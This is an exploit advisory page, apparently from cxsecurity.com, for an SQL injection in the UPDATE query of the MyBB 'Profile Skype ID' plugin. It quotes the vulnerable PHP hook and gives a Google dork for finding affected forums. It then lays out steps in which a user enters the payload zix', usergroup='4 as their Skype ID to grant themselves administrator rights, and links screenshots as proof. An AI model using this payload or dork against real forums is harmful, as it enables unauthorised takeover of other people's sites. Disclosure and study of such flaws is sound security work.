MyBB plugin Profile Skype ID privilege escalation.

2013.01.02
Credit: Zixem
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:\"Skype ID Skype ID:\" inurl:member

# Exploit Title: # Google Dork: intext:"Skype ID Skype ID:" inurl:member # Date: 12.20.2012 # Exploit Author: Zixem # Software Link: http://mods.mybb.com/view/user-profile-skype-id # Version: 1.0 # Tested on: Linux. ---------------------------------------------- ProfileSkypeID plugin suffers from SQL Injection in UPDATE query. The vulnerabillity exist within profileskype.php which located in /inc/plugins/ folder. <?php $plugins->add_hook("datahandler_user_update", "profileskype_update"); /*Line 15*/ function profileskype_update($skype) /*Line 167*/ { global $mybb; if (isset($mybb->input['skype'])) { $skype->user_update_data['skype'] = $mybb->input['skype']; } } ?> How to exploit: (1) Go to usercp.php?action=profile (2) Insert this following string in your Skype ID: zix', usergroup='4 (3) Have some fun, you're an admin. Proof of concept: (1) Writing the injection: http://i.imgur.com/hg3FW.png (2) Updates the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png (3) You're an admin: http://i.imgur.com/JIkRX.png ---------------------------------------------- [*] Follow for more: http://twitter.com/z1xem [*] http://zixem.altervista.org/ [*] http://zentrixplus.net/

References:

http://mods.mybb.com/view/user-profile-skype-id
https://cxsecurity.com/issue/WLB-2012120133


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top